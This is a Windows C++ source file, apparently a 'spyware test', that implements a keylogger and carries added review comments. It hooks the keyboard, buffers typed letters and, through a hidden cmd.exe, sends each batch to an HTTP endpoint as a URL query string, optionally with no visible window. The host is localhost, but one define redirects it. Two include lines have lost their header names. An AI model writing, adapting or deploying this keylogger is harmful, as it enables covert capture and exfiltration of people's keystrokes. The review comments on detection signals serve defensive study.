// Keyboard-hook harness (FILE_TITLE calls it "spyware test"): a hidden-able Win32 window
// installs a keyboard hook via the keylog library, buffers captured upper-case letters, and
// every TEXT_SIZE letters spawns a hidden cmd.exe that runs PRGRM_NAME against
// "http://" HOST_NAME FILE_PATH "?<letters>". Defender-relevant signals visible in this
// file: a GUI process creating a hidden cmd.exe child with all three std handles
// redirected to pipes, and an HTTP URL whose query string is raw keystroke data.
// NOTE(review): the file uses new[]/delete[] and so is C++, not C, despite the hint.
#define WIN32_LEAN_AND_MEAN
// NOTE(review): the header names of the next two #include lines were lost in extraction;
// they cannot be recovered from this page.
#include
#include
#include "keyhook.h"
#pragma comment(lib, "WSock32.lib")
#pragma comment(lib, "keylog.lib")
// Number of captured letters buffered before a send; MainMemory below is TEXT_SIZE + 1 bytes.
#define TEXT_SIZE (15)
#define HOST_NAME "localhost"
#define FILE_PATH "/save.cgi"
#define FILE_TITLE "spyware test"
// External program invoked through cmd.exe to perform the HTTP request; it is not part of
// this file, so whatever is first on PATH under that name is what runs (CWE-427 style risk).
#define PRGRM_NAME "get"
// CLASS_NAME / TITLE_NAME are not defined in this file; presumably supplied by keyhook.h.
LPCTSTR szWindowClass = TEXT(CLASS_NAME);
LPCTSTR szTitle = TEXT(TITLE_NAME);
// Defining HIDE compiles out ShowWindow/UpdateWindow in InitInstance (window never shown).
//#define HIDE
HINSTANCE hInst;
ATOM MyRegisterClass(HINSTANCE hInstance);
BOOL InitInstance(HINSTANCE, int);
LRESULT CALLBACK WndProc(HWND, UINT, WPARAM, LPARAM);
// Hands len bytes of MainMemory to a hidden cmd.exe as a URL query string.
// Returns TRUE only when CreateProcess fails (i.e. TRUE means "failure" here); the
// caller reacts to TRUE by destroying the window.
BOOL SendLogData(char *MainMemory, UINT len);

// Entry point: registers the window class, creates the window and runs the message loop.
// Returns FALSE if the window could not be created, otherwise the WM_QUIT wParam.
// NOTE(review): the return value of MyRegisterClass is not checked.
int APIENTRY WinMain(HINSTANCE hInstance, HINSTANCE hPrevInstance, LPTSTR lpCmdLine, int nCmdShow)
{
    MSG msg;
    MyRegisterClass(hInstance);
    if (!InitInstance (hInstance, nCmdShow)) { return FALSE; }
    BOOL bRet;
    // GetMessage returns 0 on WM_QUIT and -1 on error; the -1 case exits the loop without
    // a diagnostic.
    while ((bRet = GetMessage(&msg, NULL, 0, 0)) != 0) {
        if(bRet == -1) { break; }
        // No accelerator table is passed (NULL), so this always falls through to
        // TranslateMessage/DispatchMessage.
        if (!TranslateAccelerator(msg.hwnd, NULL, &msg)) {
            TranslateMessage(&msg);
            DispatchMessage(&msg);
        }
    }
    return (int) msg.wParam;
}

// Registers the top-level window class whose procedure is WndProc.
// Returns the class atom from RegisterClassEx (0 on failure).
ATOM MyRegisterClass(HINSTANCE hInstance) {
    WNDCLASSEX wcex;
    wcex.cbSize = sizeof(WNDCLASSEX);
    wcex.style = CS_HREDRAW | CS_VREDRAW;
    wcex.lpfnWndProc = (WNDPROC)WndProc;
    wcex.cbClsExtra = 0;
    wcex.cbWndExtra = 0;
    wcex.hInstance = hInstance;
    // NULL resource name: no specific icon is requested.
    wcex.hIcon = LoadIcon(hInstance, NULL);
    wcex.hCursor = LoadCursor(NULL, IDC_ARROW);
    wcex.hbrBackground = (HBRUSH)(COLOR_WINDOW+1);
    wcex.lpszMenuName = (LPCTSTR)NULL;
    wcex.lpszClassName = szWindowClass;
    wcex.hIconSm = LoadIcon(wcex.hInstance, NULL);
    return RegisterClassEx(&wcex);
}

// Creates the main window and, unless HIDE is defined, shows it.
// Stores hInstance in the global hInst. Returns FALSE if CreateWindow fails.
BOOL InitInstance(HINSTANCE hInstance, int nCmdShow) {
    HWND hWnd;
    hInst = hInstance;
    hWnd = CreateWindow(szWindowClass, szTitle, WS_OVERLAPPEDWINDOW, CW_USEDEFAULT, 0, CW_USEDEFAULT, 0, NULL, NULL, hInstance, NULL);
    if (!hWnd) { return FALSE; }
#ifndef HIDE
    ShowWindow(hWnd, nCmdShow);
    UpdateWindow(hWnd);
#endif
    return TRUE;
}

// Window procedure. WM_CREATE installs the hook; WM_KEYHOOK (presumably posted by the
// hook in keylog.lib) delivers one key code in wParam; WM_DESTROY removes the hook.
// MySetHook/MyEndHook/WM_KEYHOOK are not defined in this file — assumed to come from
// keyhook.h; MySetHook is treated as returning non-zero on failure, since that path
// destroys the window.
LRESULT CALLBACK WndProc(HWND hWnd, UINT message, WPARAM wParam, LPARAM lParam) {
    // Static, so zero-initialised: the byte at index TEXT_SIZE is never written (len is
    // reset to 0 as soon as it reaches TEXT_SIZE), which is what keeps the later "%s"
    // over MainMemory NUL-terminated. That invariant is implicit, not enforced.
    static char MainMemory[TEXT_SIZE + 1];
    static int len = 0;
    char c;
    switch (message)
    {
    case WM_CREATE:
        if(MySetHook()) { DestroyWindow(hWnd); }
        break;
    case WM_KEYHOOK:
        // Only 'A'..'Z' are recorded; every other key code is dropped.
        c = (char)wParam;
        if(c >= 'A' && c <= 'Z') { MainMemory[len] = c, len++; }
        // Flush once len reaches TEXT_SIZE. SendLogData returning TRUE signals that
        // cmd.exe could not be started, and the window is torn down.
        if( !(TEXT_SIZE > len) ){
            if(SendLogData(MainMemory, len)){ DestroyWindow(hWnd); }
            len = 0;
        }
        break;
    case WM_DESTROY:
        MyEndHook();
        PostQuitMessage(0);
        break;
    default:
        return DefWindowProc(hWnd, message, wParam, lParam);
    }
    return 0;
}

// Spawns a hidden cmd.exe with stdin/stdout/stderr redirected to pipes, writes
// "<PRGRM_NAME> http://<HOST_NAME><FILE_PATH>?<MainMemory>\r\n" followed by "exit\r\n"
// to its stdin, waits up to 3 s and closes the handles.
// Returns TRUE if CreateProcess failed, FALSE otherwise (inverted relative to the usual
// BOOL convention; see the caller in WndProc).
// NOTE(review): the names fd_read/fd_write are swapped relative to their use —
// fd_read is the parent's WRITE end (child stdin) and fd_write is the parent's READ end
// (child stdout/stderr). Nothing ever reads from fd_write.
// NOTE(review): CreatePipe, DuplicateHandle, WriteFile and WaitForSingleObject results
// are unchecked, and PI.hThread is never closed (handle leak per call).
BOOL SendLogData(char *MainMemory, UINT len) {
    HANDLE pfd_in[2], pfd_out[2];
    HANDLE fd_read, fd_write;
    short int R = 0, W = 1;
    // Inheritable handles so the child can use the pipe ends passed in STARTUPINFO.
    SECURITY_ATTRIBUTES SA;
    SA.lpSecurityDescriptor = NULL;
    SA.bInheritHandle = TRUE;
    SA.nLength = sizeof(SA);
    HANDLE hParent = GetCurrentProcess();
    // Child stdout pipe: the parent keeps a non-inheritable duplicate of the read end.
    CreatePipe(&pfd_out[R], &pfd_out[W], &SA, 0);
    DuplicateHandle(hParent, pfd_out[R], hParent, &fd_write, 0, FALSE, DUPLICATE_SAME_ACCESS);
    CloseHandle(pfd_out[R]);
    // Child stdin pipe: the parent keeps a non-inheritable duplicate of the write end.
    CreatePipe(&pfd_in[R], &pfd_in[W], &SA, 0);
    DuplicateHandle(hParent, pfd_in[W], hParent, &fd_read, 0, FALSE, DUPLICATE_SAME_ACCESS);
    CloseHandle(pfd_in[W]);
    STARTUPINFO SI;
    ZeroMemory(&SI, sizeof(SI));
    SI.cb = sizeof(SI);
    // SW_HIDE + redirected std handles: the child has no visible window.
    SI.dwFlags = STARTF_USESHOWWINDOW | STARTF_USESTDHANDLES;
    SI.wShowWindow = SW_HIDE;
    SI.hStdInput = pfd_in[R];
    SI.hStdOutput = pfd_out[W];
    SI.hStdError = pfd_out[W];
    PROCESS_INFORMATION PI;
    // lpApplicationName is NULL, so "cmd.exe" is resolved by the CreateProcess search
    // order rather than by an absolute path.
    if(CreateProcess(NULL, "cmd.exe", NULL, NULL, TRUE, 0, NULL, NULL, &SI, &PI) != TRUE){
        CloseHandle(fd_read);
        CloseHandle(fd_write);
        CloseHandle(pfd_in[R]);
        CloseHandle(pfd_out[W]);
        return TRUE;
    }
    // The child now owns its copies; drop the parent's inheritable ends.
    CloseHandle(pfd_in[R]);
    CloseHandle(pfd_out[W]);
    // Buffer size: the literal parts of the format (" http://", "?", "\r\n", NUL) total
    // 12 bytes, covered by the +16 slack. This relies on strlen(MainMemory) == len.
    int SendAllDataLen;
    SendAllDataLen = (int)strlen(PRGRM_NAME);
    SendAllDataLen += (int)strlen(HOST_NAME);
    SendAllDataLen += (int)strlen(FILE_PATH);
    SendAllDataLen += len;
    char *SendAllData = new char[SendAllDataLen + 16];
    wsprintf(SendAllData, "%s http://%s%s?%s\r\n", TEXT(PRGRM_NAME), TEXT(HOST_NAME), TEXT(FILE_PATH), MainMemory);
    DWORD sLen;
    // Command line goes to the child's stdin (fd_read is the write end, see above).
    WriteFile(fd_read, SendAllData, (int)strlen(SendAllData), &sLen, NULL);
    FlushFileBuffers(fd_read);
    WriteFile(fd_read, "exit\r\n", 6, &sLen, NULL);
    FlushFileBuffers(fd_read);
    // 3 s timeout; on expiry the child is neither terminated nor reaped — it presumably
    // keeps running after this returns, and since fd_write is never drained, a child
    // that writes more than the pipe buffer could block indefinitely (inferred, not
    // shown).
    WaitForSingleObject(PI.hProcess, 3000);
    CloseHandle(PI.hProcess);
    CloseHandle(fd_write);
    CloseHandle(fd_read);
    delete []SendAllData;
    return FALSE;
}